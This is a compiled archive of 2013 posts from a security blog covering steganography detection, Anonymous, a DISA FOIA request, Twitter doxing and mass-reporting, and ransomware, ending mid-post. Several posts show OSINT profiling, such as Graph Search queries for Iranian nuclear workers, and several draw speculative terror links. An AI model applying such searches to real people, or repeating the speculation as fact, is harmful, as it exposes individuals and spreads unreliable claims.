[6] Congratulations. You just rooted @th3j35t3r. The lesson to take away from this is that no matter how secure or complex your password is...do not have a false sense of security about your systems. Software vulnerabilities can give users backdoors to your private information without a password! ...sometimes it only requires a little thinking outside the box. BONUS: Can you crack Th3J35t3r's root password? Here's a link to get you started...
[7]http://www.sf2600.com/weblog/2011/apr/06/challenge/
1. http://th3j35t3r.wordpress.com/
2. http://3.bp.blogspot.com/-ZbBOmlMOwoo/UOHY28FLMHI/AAAAAAAAAQ4/Mu3SDrAHSAI/s1600/step1.png
3. http://1.bp.blogspot.com/-TLGsu-lobIc/UOHZPw6ccBI/AAAAAAAAARA/O0EDJxl7Roc/s1600/step2.png
4. http://2.bp.blogspot.com/-vnXgT0RLPJs/UOHagjEB01I/AAAAAAAAARQ/9wYDaeyleEs/s1600/step3.png
5. http://2.bp.blogspot.com/-6x2GhkZSmhE/UOHbAizAasI/AAAAAAAAARY/OvNardwLEi0/s1600/step4.png
6. http://3.bp.blogspot.com/-nm10BPWPxzM/UOHbNtvfKqI/AAAAAAAAARg/MEzPysMpX10/s1600/step5.png
7. http://www.sf2600.com/weblog/2011/apr/06/challenge/


Chapter 3

2013

3.1

January

3.1.1

Anonymous and Steganography - Blindly Distributing Terrorist Messages? (2013-01-03 12:12)

As previously warned multiple times by [1]Th3J35t3r and [2]myself, Anonymous may be unwitting pawns in a much larger chess game. While their public support of terrorist organizations is being dismissed with "anyone can claim to be Anonymous", their blind distribution of encrypted files containing information from outside entities may not even be known to the inner-most circles of the organization. What encrypted files? One of the most common means of distributing Anonymous-related information is through social media - especially through the distribution of image files. Little known to many outside the security field is that images can be used to hide information through a process called steganography. For those not familiar with the topic, here is an excellent [3]whitepaper on how steganography works as well as how to detect it. I have started using the StegDetect program from [4]Outguess.org and have found some interesting results. I recently started analyzing several images being re-posted by the Twitter handle [5]@YourAnonNews. Out of 51 images analyzed I found two images which returned positive as having embedded data, as well as two additional images which generated errors during analysis (possibly obfuscated?). The first picture with a positive hit was an internet meme of the TV show Game of Thrones. The picture was re-posted by @YourAnonNews here: [6]https://twitter.com/i/#!/YourAnonNews/media/slideshow?url=http%3A%2F%2Ftwitpic.com%2Fbqiggl However, the image originated from [7]@57UN here: [8]http://twitpic.com/bqiggl Below is the image re-posted by @YourAnonNews.

[9] Picture re-posted by @YourAnonNews - Click to Enlarge

And here is a similar meme picture which is almost the exact same size, as found on [10]http://whosin.com/pg/whois/24118207/Maine+Memes

[11] Similar Meme Picture - Click to Enlarge

Running StegDetect against the "Gym" picture above produces a hit for embedded data using jphide, while running it against the "Sandy" picture does not. Similarities between the two pictures:

Both are of the same content, with only a slight variation (text at the bottom)
Both are 72 dpi resolution
Both are 24-bit color depth

There are also some interesting differences between the two pictures:

The Gym picture is 600x461 pixels while the Sandy picture is 600x460 (Gym is one pixel taller)
The Gym picture is 69,919 bytes while the Sandy picture is 51,416 bytes (26% difference)

Error Level Analysis (ELA) using [12]FotoForensics produces some interesting results.


[13] ELA - @YourAnonNews reposted image

[14] ELA - Sandy image

Areas in white indicate the image has possibly been altered from its original (see the [15]FotoForensics Tutorial). As you can see above, there has been significant altering of the first image while the second remains fairly uniform. You would expect that the images would display the same ELA pattern - the fact that they are drastically different indicates something has definitely been altered. So the question remains - is there something embedded inside this image? I believe so. Unfortunately all of my attempts to crack the password failed. Whatever secret this image holds we may never know. But I believe it definitely holds a secret.

UPDATE 1: It was suggested in the comments below that this is simply a result of resizing or cropping the image. As such I cropped both images as suggested...and this provided some rather interesting results.

[16] Suspect steganography image "Gym" cropped

[17] ELA of cropped "Gym" image

As you can see above, the ELA for the cropped Gym image suspected of containing steganography doesn't change much. More interesting is that StegDetect now throws an error instead of a negative/positive hit for steganography:

error: Quantization table 0x01 was not defined

[18] Image "Sandy" cropped

[19] ELA of image "Sandy" cropped

The baseline Sandy image ELA does change slightly, but still not as profoundly as the suspected ELA image above. This image also produces the same message when running StegDetect:

error: Quantization table 0x01 was not defined

Therefore I believe it is safe to conclude that the positive detection for steganography is not a result of resizing or cropping the image.

Related Reading:

Al-Qaeda uses steganography - documents hidden in porn videos found on memory stick - [20]http://www.infosecurity-magazine.com/view/25524/alqaeda-uses-steganography-documents-hidden-in-porn-videos-found-on-memory-stick/

Hidden Pictures: Steganography, Al-Qaeda and Anonymous - [21]http://sofrep.com/15858/hidden-pictures-steganography-al-qae da-anonymous/


1. http://jesterscourt.mil.nf/2012/11/09/anonymous-getting-pwned-and-not-by-me/
2. http://caffeinesecurity.blogspot.com/2012/03/flash-farce-dangers-of-social-media.html
3. http://www.citi.umich.edu/u/provos/papers/practical.pdf
4. http://www.outguess.org/download.php
5. https://twitter.com/YourAnonNews
6. https://twitter.com/i/#!/YourAnonNews/media/slideshow?url=http%3A%2F%2Ftwitpic.com%2Fbqiggl
7. https://twitter.com/57UN
8. http://twitpic.com/bqiggl
9. http://1.bp.blogspot.com/-S8PhSKY7q9Y/UOWz5trv8DI/AAAAAAAAARw/cd3Itevy96Y/s1600/1+star+hit+jphide+-+709659093.jpg
10. http://whosin.com/pg/whois/24118207/Maine+Memes
11. http://1.bp.blogspot.com/-eUT843By6fg/UOW0hLpIPVI/AAAAAAAAAR4/XJtFKQW98T4/s1600/A6F1CaVCcAAauVR-orig.jpg
12. http://fotoforensics.com/
13. http://3.bp.blogspot.com/-XoD8s3mNNok/UOW46rchGCI/AAAAAAAAASI/vq7xXVMBlsA/s1600/c7ef19db91b291961c56f6a16c0f38c3945ff416.69919-ela.png
14. http://3.bp.blogspot.com/-gH3c9jWaIvA/UOW5FPVC2UI/AAAAAAAAASQ/DuUyE3HjKIM/s1600/bf753f22430c3ba469f0aa29746ae1cefa0bd0cf.51416-ela.png
15. http://fotoforensics.com/tutorial-ela.php
16. http://1.bp.blogspot.com/-dwqS840xGT0/UOba4pedLeI/AAAAAAAAASk/zue4uhpPRTo/s1600/1+star+hit+jphide+-+709659093+-+cropped.jpg
17. http://2.bp.blogspot.com/-s53EOmL_EzQ/UObbe1o0bQI/AAAAAAAAAS0/kITgmFy4qkY/s1600/gym-cropped-ela.png
18. http://4.bp.blogspot.com/-09r3Z-sNAKg/UOba4hR8jqI/AAAAAAAAASo/NW3LU6V6BxM/s1600/A6F1CaVCcAAauVR-orig+-+cropped.jpg
19. http://1.bp.blogspot.com/-VRTjt7C_HNY/UObb1IXZtuI/AAAAAAAAAS8/UgvPFdtGZ5A/s1600/sandy-cropped-ela.png
20. http://www.infosecurity-magazine.com/view/25524/alqaeda-uses-steganography-documents-hidden-in-porn-videos-found-on-memory-stick/
21. http://sofrep.com/15858/hidden-pictures-steganography-al-qaeda-anonymous/

3.1.2

DISA Gold Disk and SRR - The Lost Security Tools (2013-01-07 10:46)

UPDATE: I have sent a FOIA request to DISA for the Gold Disk. Depending on the success of this request, I will follow up with a FOIA for the Unix SRR. You can read my request [1]here.

Today I sent an email to [2]DISA requesting a public copy of the Gold Disk and SRR tools. For those unfamiliar with the tools, they used to be available from [3]http://iase.disa.mil/stigs/index.html. However, the tools are now PKI protected and no longer accessible to the public. According to DISA's web site these tools are unlicensed...putting them in the public domain. Here is a description of both tools directly from DISA's website:

Security Readiness Review (SRRs) Scripts test products for STIG compliance. SRR Scripts are available for some operating systems and databases that have STIGs. The SRR scripts are unlicensed tools developed by the FSO and the use of these tools on products is completely at the users own risk. The DISA FSO Windows Gold disk tool provides an automated mechanism for compliance reporting and remediation to the Windows STIGs. The FSO Windows Gold Disks are an unlicensed tool developed by the FSO, the use of this tool is completely at the users own risk.

Currently, the Gold Disk supports Windows XP, Windows Vista, Windows 2003, and Windows 2008 R1. There are no plans to develop Gold Disks for future technologies or products; FSO will utilize the SCAP standards for compliance reporting for Windows 7.

Hopefully they will provide the tools without any issue. If not, my next step will be a FOIA request. It is my hope that, should they provide the tools, someone may continue working on them for private sector use. In the meantime...SCAP versions of all STIGs (DISA security guides) are publicly available: [4]http://iase.disa.mil/stigs/dod_purpose-tool/index.html
1. http://caffeinesecurity.blogspot.com/2013/07/disa-gold-disk-foia-request-sent.html
2. http://iase.disa.mil/
3. http://iase.disa.mil/stigs/index.html
4. http://iase.disa.mil/stigs/dod_purpose-tool/index.html

3.1.3

If Anonymous is to Survive They Must Remove the Mask (2013-01-13 11:51)

[1] Over the past couple of years Anonymous has gone from a group of pranksters doing it "for the lulz" to a massive global collective of political activists and hacktivists. But there's trouble brewing for Anonymous. As a group with no membership roster and no criteria for joining, they have opened themselves up to infiltration. The flaw which will be Anonymous' downfall is that anyone can be Anonymous. Infiltration by whom, you might ask? For one...law enforcement agencies. The best example of recent infiltration would be the cooperation of [2]Sabu with the FBI. His cooperation resulted in the arrest of multiple Anonymous members and should have served as a wake-up call to the rest of the group that they must reform or die. But infiltration by law enforcement should be the least of Anonymous' worries. It is beginning to come to light that Anonymous may be [3]unwitting mules for terrorist organizations. And let's not forget that the Mexican drug cartel Zetas were recently burned by Anonymous and [4]swore revenge. Anonymous members who had nothing to do with the confrontation with the Zetas may be subject to infiltration and revenge by the Zetas as guilt by association. Unlike law enforcement, the Zetas don't really care about due process or burden of proof...and will simply snatch someone in the middle of the night and kill them.

So this is a message to any Anonymous members who will listen - if you want to survive you need to remove the mask. Otherwise you will be led to your doom like lambs to the slaughter. There are already leadership structures within Anonymous - everyone knows this. Drop the Anonymous mask completely. Start keeping membership rolls - and purge yourselves of the undesirables - especially terrorist organization members. And finally - if you really want to make a difference, stop the illegal activities, such as hacking or denial of service attacks. You'll gain a lot more credibility if you start performing your political activism legally instead of through illegal means. You can either be labeled as criminals, or heroes. But not both.
1. http://4.bp.blogspot.com/-y1_c0_-f_Ro/UPLl4UqZSqI/AAAAAAAAATo/hUO38HWT7jA/s1600/anonsheep.png
2. https://twitter.com/anonymouSabu
3. http://sofrep.com/15858/hidden-pictures-steganography-al-qaeda-anonymous/
4. http://www.guardian.co.uk/technology/2011/nov/02/anonymous-zetas-hacking-climbdown

3.1.4

Seculert Using Scare Tactics to Obtain Customers? (2013-01-13 12:04)

I received a pretty disturbing LinkedIn message a while back from someone claiming to have knowledge of compromised systems within my company's internal network...

"Ken I saw your post about security. I am in security as well. Maybe we could meet up as I am in Baltimore. I am doing some consulting for www.seculert.com Check it out it is pretty incredible stuff. I can show you all of <removed>'s compromised machines from the Botnet network and our software by not going to your network. It is insane."

After visiting Seculert using a browser with paranoid security settings (yay NoScript!), I found they actually appear to be a legitimate company...although I use the term lightly based upon the above message. They apparently offer intelligence-based cyber threat management through searching the internet. No different from setting up some well-written Google Alerts, really. What's really interesting is that this spam message came from a [1]LinkedIn profile which is highly recommended by managers from SourceFire and Tenable Network Security. I replied to this message from Stephen trying to obtain more information to verify the validity of his claims, and received absolutely no response. I performed several searches for similar spam messages, but couldn't find any. So perhaps this is a new advertising technique they are testing? I'm curious to hear their response. I performed a little research on Seculert, and couldn't find much. Seculert.com has been around since 01/03/2010. The domain seculert.com is hidden by DomainsByProxy, and the website provides basic details for contact information, listing the company as originating in Petach Tikva, Israel. Seculert's [2]Twitter account has been active since August 2010. They have 550 followers, and follow 73 people. Only 182 tweets have been sent. Seculert's [3]LinkedIn page states they have between 1-10 employees.

Based upon the above info, this is most likely a real company...but I really question: 1) their advertisement scare tactics and 2) the value of their services, when you can set up Google Alerts to perform the same functions. I encourage Seculert to reply here, especially to address my concerns regarding scare-tactic spamvertisements over LinkedIn.
1. http://www.linkedin.com/in/stephenschwingpentesting
2. https://twitter.com/seculert
3. http://www.linkedin.com/company/seculert

3.1.5

Spam (2013-01-13 12:05)

[1]Brielle Franklin [2]October 10, 2012 11:58 AM

I was devastated last month when all the GoDaddy sites went down. I panicked a little because I thought I may have lost everything. Then I remembered that a few months ago I started backing everything up because of an article I read about having a [3]disaster recovery plan. Even though this wasn't quite a disaster I still was able to do my work for the day instead of getting behind. Thanks for sharing this post. http://www.sungardas.com/Solutions/DisasterRecovery/Overview/Pages/DisasterRecoveryOverview.aspx
1. http://www.blogger.com/profile/11755041481969452357 2. http://caffeinesecurity.blogspot.com/2012/09/the-anonymous-lies-keep-building.html?showComment= 1349884709887#c4855407602713684496 3. http://www.sungardas.com/Solutions/DisasterRecovery/Pages/DisasterRecoveryOverviewRedirect.aspx

3.1.6 Do you enjoy my posts? Nominate me for a Shorty award! (2013-01-15 15:41)

Security isn't one of the Shorty Awards' main categories...but that doesn't mean you can't nominate me for an award in it! What are the Shorty Awards? From their website:

The Shorty Awards honor the best in social media; recognizing the people and organizations producing real-time short content across Twitter, Facebook, Tumblr, YouTube, Foursquare and the rest of the social web. I strive to provide the best cyber security related content available. If you appreciate the content I provide please head over to the [1]Shorty Awards and cast your vote for me in #security. This will help me to provide my content to an even broader audience and help promote security awareness! Thank you!

Nominations open: January 7, 2013
Nominations close: February 10, 2013
Awards ceremony: April 8, 2013 in New York
1. http://shortyawards.com/CaffSec?category=security

3.1.7 Reaching out to the @EFF for assistance with DISA Gold Disk and UNIX SRR FOIA Request (2013-01-17 17:30)

Due to DISA's resistance to my request for a public copy of the DISA Gold Disk and UNIX SRR security evaluation tools, I have reached out to the Electronic Frontier Foundation for assistance with filing a Freedom of Information Act request. I have already been informed by the DISA Office of General Counsel that this is a technical issue, not a legal issue. I hope that with their help I can acquire the following for DISA Gold Disk and UNIX SRR:

User Documentation
Binary Executables
Source Code
Developer Documentation
All other related documents

Stay tuned!

3.1.8 Entropia - The Online Sweatshop Scam (2013-01-28 11:06)

It isn't often that I talk about video games on my blog. However...I recently had an encounter with a pyramid scheme/scam so disappointing that I had to write about it. At the suggestion of several online friends I recently started playing [1]Entropia Universe. For those who don't know, this is a Free to Play MMORPG. I use the term Free to Play rather loosely...as I believe the game should actually be termed Free or Play. The currency in the game, PED, has a direct conversion ratio to real US dollars: $1 = 10 PED. You can earn PED in game by hunting animals or mining resources. You can deposit real money to get started...or earn money in-game. Sounds good, right? Too good to be true? A game that pays you to play? Now the catch... The entire game is a casino with the odds stacked in the house's favor. As you're out hunting or mining...all of your equipment degrades and must be repaired. In fact the equipment degrades so quickly...and your ammo is depleted much faster than your income...that you end up losing all your in-game currency. Sure - there's a chance you could score big and find an item worth hundreds of PED. But the odds of that occurring are so low...you still might not recoup your losses. At one point I had accumulated 6 PED from gathering resources and hunting animals. But by the time I was done...I had no ammo and my medkit was completely broken. Since it was a starter medkit it couldn't be repaired. So first I replaced my medkit. I found what appeared to be a really good medkit on the auction house for 5 PED...leaving me 1 PED to buy ammo. That should be plenty, I thought! So I buy the medkit...and I can't equip it. Apparently someone sold me a BROKEN medkit. I take my remaining 1 PED and repair the medkit. But apparently 1 PED is only enough to repair the medkit by two percent...meaning the kit will break after just a few uses. I'm also now completely broke money-wise...and still haven't purchased any ammo. At this point...you've got two options.
The easier method of continuing to play is to deposit real money. However this could be rather expensive...as it would take a $100 deposit to obtain only 1000 PED. The harder method...but less expensive...is to gather sweat from creatures. You literally stand there with a sweat collector tool while creatures slowly kill you. Not exactly a fun process by any means. Apparently the sweat from animals is used in creating mind force...the Entropia version of magic. The current going rate for sweat is two PED for one thousand sweat. In real world money...that's $0.20 US. Sound good, right? $0.20 US for gathering 1000 virtual items. I started gathering sweat. And about an hour later...I had gathered 100 sweat! Only 9 hours to go...and I'd be able to gain a full lot of 1000 sweat. This is where basic math shows that it's not really worth the effort. We can calculate our pay rate by solving the following equation:

Total pay = Rate × Time

So plug in our numbers and simplify the equation:

$0.20 = Rate × 10 hours
Rate = $0.20 / 10 hours
Rate = $0.02/hour

The fact that you're gathering sweat is truly ironic...since you're being paid sweatshop wages. There are people in the game who do make a lot of money...and much like any pyramid scheme the early adopters gain all the spoils. Players who have been around for a rather long time have purchased land deeds and actually collect taxes from those who hunt or gather resources on their land. And while they sit back and rake in their fortunes...new players are for the most part completely unaware that they are being exploited by the early adopters of the game. However...I'm happy to announce that I found a way to win at Entropia...a method which is most likely frowned upon by the game creators and the players who exploit the newbies. I uninstalled the game.

NOTE: The original article stated that $10 = 1 PED. This has been corrected to $1 = 10 PED and all calculations adjusted. Sadly - this changes the pay rate for sweating to $0.02/hour instead of the original $2/hour.
1. http://www.entropiauniverse.com/

3.1.9 Anatomy of a Twitter False Flag-Spam and Dox Attack (2013-01-28 22:03)

Recently an alarming number of Twitter users have been suspended for doing nothing wrong. This originally started in April, as reported by the conservative news site [1]Human Events, and has recently begun to spiral out of control beyond the realm of politics and simple account suspensions. The original attack is quite simple - get enough Twitter users to report a user for spam...and the target user's account is suspended. According to [2]Human Events this attack was originally being used by left wing liberals to silence right wing conservatives for expressing their views. While I will not get into the political issues of this and why this goes against freedom of speech...something I will mention is that a defense network is being built to help protect against these attacks. Called the Twitter Gulag Defense Network (TGDN), tips are shared among members and follow-backs are implemented...the idea being that the more accounts you have following you, the more protected you are against people gaming the spam flag system...as most spammers have very few followers. Unfortunately I recently saw this attack take on a much more sinister twist against someone I frequently chat with on Twitter. Hacking groups such as subgroups of Anonymous and other groups have begun performing these attacks while simultaneously doxing the target. This attack requires coordination and timing. The ultimate effects are quite devastating...as the victim's online identity is attacked while simultaneously attacking the person in real life through harassing phone calls to the target and target's family, and in some cases, attempts to destroy their credit rating. Using Maltego I mapped one of these Twitter censorship networks based upon frequency of tweets exchanged and common hashtag subjects.
Note that I am not including specific account names or real names (yes, I found several of their names and addresses) because unlike those who I investigated I do respect their privacy and will not reveal their personal information to the public.

[3] (image: Maltego map of the censorship/dox network)

The networks themselves seem to work in an interesting hierarchy. A small group of two or three leaders provide target information to the rest of the network...some of which are not aware of the other parts of the network, much like a [4]terrorist cell. One or more groups work on gathering and posting dox of the person's personal information...while a much larger group works to false flag-spam the target account(s). The groups use resources such as Tor, Pastebin, and Doxbin to coordinate their attack...often times not knowing who will actually be using the gathered information. To increase their success, sock-puppets are often used to taunt the person into replying...then the person is reported for spam. Once enough spam reports have been received, using a ratio of followers-to-reports, Twitter automatically blocks the account. Twitchy has an excellent [5]guide to defending yourself from the false flag-spam attacks. As for doxing...the best defense is to minimize your digital footprint through your social media privacy settings as well as to be vigilant for phishing attempts. Should you become the victim of doxing, it's best to [6]involve law enforcement.
1. http://www.humanevents.com/2012/04/30/attack-of-the-flag-spammers/ 2. http://www.humanevents.com/2013/01/08/the-twitter-gulag-defense-network/ 3. http://4.bp.blogspot.com/-RaYdWD-r9J0/UQc3klPEDJI/AAAAAAAAAUA/U9r4xFe7tOQ/s1600/censorship-dox-network.png 4. http://en.wikipedia.org/wiki/Clandestine_cell_system 5. http://twitchy.com/2013/01/08/tgdn-boot-camp-twitter-gulag-defense-network-founder-shares-tips-for-avoiding-twittergulag/?utm_source=autotweet&utm_medium=twitter&utm_campaign=twitter 6. http://theconservativetreehouse.com/2012/11/28/the-illegal-activity-of-doxing-revealing-documents-or-personal-information-about-a-person-without-their-permission-w

3.2 February

3.2.1 White House to Issue Cyber Security Executive Order (2013-02-11 21:39)

According to [1]TheHill.com the White House will release an executive order this week to address cyber security and critical infrastructure. I'd like to share with everyone a letter I wrote in January 2012 as part of an application to the White House Fellowship program (my application was turned down). [2] [3]

Mr. President, I believe that a national cyber security education and protection program should be established. This program would not only target cyber security professionals, but all Americans, especially the average home or business user, and owners of critical infrastructure such as power, phone, gas, and water. Most cyber attacks are launched from networks of compromised systems, called botnets. A system normally becomes compromised due to a user's lack of proper security controls and procedures, including missing or out of date antivirus software, missing or disabled firewall software, or missing vendor security patches. These factors, combined with a lack of understanding of how systems become infected with malware, result in the average user's system becoming infected. Most malware infections could be prevented through basic user education. The Federal Information Security Management Act (FISMA) does an excellent job of holding Federal agencies and contractors responsible for the security status of their computer systems. However, FISMA provides no guidance for the private sector or home users. Payment Card Industry (PCI) provides requirements and guidance for the private sector when dealing with credit card transactions, but this does not apply to many businesses. As long as security guidance is lacking in the home and private sector, continued malware infections will threaten the entire United States, including Federal systems. Infected private systems can be used as cyber weapons to attack government systems, steal financial details, and possibly even disrupt critical infrastructure. A national cyber security education and protection program would:

Raise user awareness on the necessity of antivirus and firewall computer security software, as well as the need to install vendor security patches.
Educate users on the threats which can be encountered online, and how to protect themselves.
Protect critical infrastructure through regulatory requirements designed to prevent attacks against power, phone, gas, and water services.

It is my belief that through guidance and critical infrastructure regulation, users can become aware of the critical threats against their computer systems, and how to protect themselves. After all, a threat to one system is a threat to all systems. Thank you, Ken Buckler

[4]Link to Original Letter

I'm very anxious to see how my letter compares with the actual executive order once it has been released.
1. http://thehill.com/blogs/hillicon-valley/technology/ 282269-white-house-poised-to-release-cybersecurity-executive-order-on-wednesday 2. http://www.blogger.com/blogger.g?blogID=8334696259846048585 3. http://www.blogger.com/blogger.g?blogID=8334696259846048585 4. https://docs.google.com/document/d/1Aa8XRiHJTTLMuvhWRn0Cs5xgGeEIuNFe4RbEl7NMsGg/edit?usp=sharing

3.2.2 Identity of @th3j35t3r Revealed (2013-02-14 20:14)

While this post is not directly related to security...I felt it was worth sharing with others. Who is [1]th3j35t3r? That's the million dollar question now, isn't it? For those not familiar, th3j35t3r is a cyber-activist known for attacking known terrorist websites as well as Westboro Baptist Church and factions of Anonymous. There have been many attempts to identify the true identity of th3j35t3r...but according to him [2]none have been correct.

The endless attempts to find th3j35t3r's true identity have become a humorous game for him...to the point that he has set his Twitter background picture to supposedly contain an encrypted version of his full identity.

[3] The image which supposedly contains th3j35t3r's identity.

Another theory which has been circulating is that th3j35t3r is not just one person but actually a group of several people associated with Tom Ryan...the security researcher responsible for the [4]Robin Sage experiment. Let's look at just a few of the actions th3j35t3r has taken...

He has taken down multiple terrorist organization communication forums.
He has taken down Westboro Baptist Church in response to their picketing soldiers' funerals.
He correctly identified a key Anonymous hacker, Sabu, as Hector Monsegur, possibly leading to his arrest.

More importantly...

He has raised online security awareness for many people.
He has exposed possible links between terrorist organizations and Anonymous.
He has raised awareness of the [5]Wounded Warrior Project...an organization devoted to helping wounded service members.

Th3j35t3r's actions have angered the terrorist organizations...the Westboro Baptist Church...and the entire Anonymous collective...and yet they are unable to intimidate or stop him. Th3j35t3r works completely alone...and because of that he does not need to worry about someone betraying his identity. So who is th3j35t3r? The fact of the matter is...the real name of th3j35t3r doesn't truly matter. Th3j35t3r is an idea...a light in the darkness...a beacon of hope. He is proof that one person can make a difference despite all opposition. In today's world...with so much resistance against individuality and pressure to conform to society...he is a symbol that you need not align yourself with others in order to effect change. Even if you disagree with th3j35t3r's message and actions...you should not overlook the underlying symbolism of what he stands for - that one person can make a difference. Never give up on what you believe in - be the light in the darkness. Be the beacon of hope. Do not be intimidated by the words or actions of others...and given enough patience you will succeed.
1. https://twitter.com/th3j35t3r 2. http://pastebin.com/vrVey16U 3. https://twimg0-a.akamaihd.net/profile_background_images/672836329/6ee312697a0642b68edcde16a93aac2d.gif 4. http://www.networkworld.com/news/2010/070810-the-robin-sage-experiment-fake.html 5. http://www.woundedwarriorproject.org/

3.2.3 Tracking Your Digital Footprint with Google (2013-02-18 23:59)

http://www.infosecisland.com/blogview/19318-The-Subtle-Art-of-OSINTOpen-Source-Intelligence.html?utm_medium=twitter&utm_source=twitterfeed


3.2.4 Facebook Graph Search and OSINT (2013-02-20 20:21)

Facebook Graph Search is one of the newest features of Facebook. It allows you to data-mine every person and page on the entire social network. You can get an introduction at [1]this page. It's not available for everyone yet...but you can sign up for early access if you'd like. It is extremely powerful as an OSINT (Open Source Intelligence) tool. A tumblr site called [2]Actual Facebook Graph Searches shows some of the more interesting search results. So, I decided to give it a try myself. The results are rather eye opening. Many, including Th3J35t3r and myself, have repeatedly warned that Anonymous has been infiltrated by terror organizations such as Hamas. As they say...the proof is in the pudding. One of the first searches I performed was People who like Izz ad-Din al-Qassam Brigades and like Anonymous. For those not familiar...Izz ad-Din al-Qassam Brigades is the military branch of the terrorist organization Hamas.

[3] Sample search results for People who like Izz ad-Din al-Qassam Brigades and like Anonymous

The results really do speak for themselves. It's clear that there are many who associate themselves with both Anonymous and Hamas. The next search I performed could be quite dangerous. Current Iran residents who work at Nuclear Power Plants

[4] Sample search results for Current Iran residents who work at Nuclear Power Plants

It's already known that spy agencies of countries who do not want to see Iran's nuclear program advance have been [5]killing Iranian nuclear scientists. Despite this...many Iranians who work at Iran's nuclear power plants have listed their employment location...opening themselves up to possible assassination. Graph search can also provide some interesting political and employer affiliations...

[6] People who like Communism and work at MSNBC
[7] People who like Marxism and work at CNN
[8] People who like National Rifle Association and work at Fox News

Note that Facebook automatically replaced MSNBC with alternatives - such as NBC TV shows. It also includes previous employers in the search. So what does this all mean? Well...it might be time to review your privacy settings. Furthermore...you might want to clean up your likes. Especially if you're a member of a terrorist organization or employed by the media.
1. https://www.facebook.com/about/graphsearch 2. https://www.facebook.com/about/graphsearch 3. http://2.bp.blogspot.com/-tA9Wi3qfqcs/USVtmFoNq5I/AAAAAAAAAUY/1k8iz8pI6OE/s1600/anonhamas.jpg 4. http://3.bp.blogspot.com/-V0PHSeqWE9E/USVwm39ok3I/AAAAAAAAAUs/B-BRb8KX_H8/s1600/iran-nuclear.jpg 5. http://www.guardian.co.uk/commentisfree/2012/jan/16/iran-scientists-state-sponsored-murder 6. http://3.bp.blogspot.com/-jYr8JVgqyrY/USVzVDrnK7I/AAAAAAAAAVA/FO-XYv0nefQ/s1600/msnbc.jpg 7. http://4.bp.blogspot.com/-ILYapCTgSO4/USV0dDiQpwI/AAAAAAAAAVM/m0-yXj65kto/s1600/cnn.jpg 8. http://4.bp.blogspot.com/-W0h20OYJMP0/USV1EnPvvzI/AAAAAAAAAVU/tm9GFwdozNQ/s1600/foxnews.jpg
3.2.5 Browsing Safely on an Unsecured Network (2013-02-21 20:00)

Today I was requested to provide a few recommendations for safely browsing the web while on a public wifi. Always happy to oblige...here it is. Unsecured networks - such as a public WiFi hotspot - can be absolutely great for saving you money. However, these networks are not always the safest to use without some additional protection. Besides making sure to have updated Firewall and Anti-Virus software, you should also consider setting up a virtual private network (VPN). A VPN creates a private tunnel to route your internet traffic securely. The first method for securing your connection is to set up your own VPN server at home, then connect to the VPN from any public network. The best software I could find for this is [1]OpenVPN. This software would allow you to set up your own private network directly connected to your home network...and would be the safest option. However, it is not easy for the average user to set up, and there may be licensing fees involved. An alternative which is almost as safe as using your own home VPN is to use [2]HotSpotShield. This software allows you to connect to their company's servers and not your own. A free (ad-supported) version is available as well as a monthly fee version. If considering this for regular use I would recommend paying the $29.95 per year. A third option which is slightly more risky is to use [3]Tor. This option is considered more risky because you're routing through several random servers on the Internet. The network is 100% user supported with no ads. However...you have very little guarantee of being on a secure exit node...and could possibly end up with an exit node set up to monitor your every browser click. Finally, no matter what option you select, consider installing [4]HTTPS Everywhere. This add-on enforces HTTPS whenever possible on most websites - and provides an additional layer of security. Do you have any additional tips for securing your connection over an unsecured wifi network?
Please feel free to share in the comments below.
1. http://openvpn.net/ 2. http://www.hotspotshield.com/en 3. https://www.torproject.org/ 4. https://www.eff.org/https-everywhere

3.3 March

3.3.1 Caffeine Security Blogging On The Go! (2013-03-05 21:48)

I recently purchased a Samsung Galaxy Tab 2 10.1. I also purchased a Bluetooth keyboard to accompany it. This means I'll be able to blog on the go, and hopefully provide even more content on a regular basis! Stay tuned, and I'll soon provide a list of the security related software I've loaded.

3.3.2 Guest Post: Ransomware Threat Escalates Worldwide (from @pentesttraining) (2013-03-07 19:18)

The following is a guest post submitted to Caffeine Security. The owner of Caffeine Security is not responsible for its content.

Consumers face a growing malware threat that echoes the fear and helplessness of a kidnapping. The latest malware ploy, called ransomware, literally holds a user's data hostage. In return for the promise of unlocking the computer or cell phone, digital kidnappers demand money or potentially lucrative information. Experts estimate that ransomware netted criminals over $5 million in 2012 alone.

How Ransomware Kidnaps Data

Ransomware is digital extortion that locks out users from their computers until a demand for money is met. This type of malware is also known as a cryptotrojan, cryptovirus, or cryptoworm and uses two ploys. Lockscreen ransomware displays a full-screen image or website that blocks the user from further computer access. The Reveton Trojan attacks, which peaked in 2012 and purport to be from the FBI, are of the lockscreen type. Encryption ransomware encrypts a system's files and promises a decryption code in exchange for money. Some of the encryption algorithms are so strong that the victim in effect loses all files. Ransomware is drive-by malware that infects users who visit compromised websites. The victim sees a frightening message, which often purports to be from a law enforcement agency, stating that the user has accessed an illegal website or violated a law. In exchange for online payment of a fine, the user will receive a code to unlock the screen or decrypt files. Unfortunately, paying up does not result in a password, and meanwhile the malware installs on the infected system to capture personal data. Duped users must spend even more money to hire a computer expert to clean the system. The ransomware threat has exploded within the past two years and continues to grow. According to ABC News, security software firm Symantec has traced the largest exploits to 12 hacker gangs. Although British police caught one gang in December 2012, exploits are spreading globally. One attack hit over 500,000 users within two weeks, and 3 percent of them obeyed the ransom demands to no avail. Their computers remained locked, and the scammers got away with the money.

How to Rescue Kidnapped Data

Experts recommend that users not give in to ransomware demands as attackers have no intention of releasing the system. If users capitulate, they will lose money or sensitive information and will not regain access. Further, malware will continue to run silently and capture personal information.
Victims should always assume that a system is still compromised until a computer expert has recovered it. As an example, Symantec in February identified a variant called Trojan.Ransomlock.Y that lurks on pornography sites and prompted a January 2013 spike in ransomware attacks. The lockscreen ransom note claims to be from the FBI and states that the user has violated criminal law and must pay $200 via MoneyPak within 72 hours. Doing so does not unlock the system, and the FBI advises victims not to pay. Instead, users should engage a skilled technician to disinfect the computer. They should also report ransomware incidents to the IC3 at ic3.gov, a joint initiative between the FBI and the National White Collar Crime Center to combat Internet crime. Security software vendors have publicized steps to remove specific ransomware variants. Power users may wish to attempt this on their own. However, the safest bet is to hire a professional to clean the system and ensure that malware is not running in the background. If the attack is encryption malware, even an expert might not be able to rescue the files.

How to Defend Against Ransomware

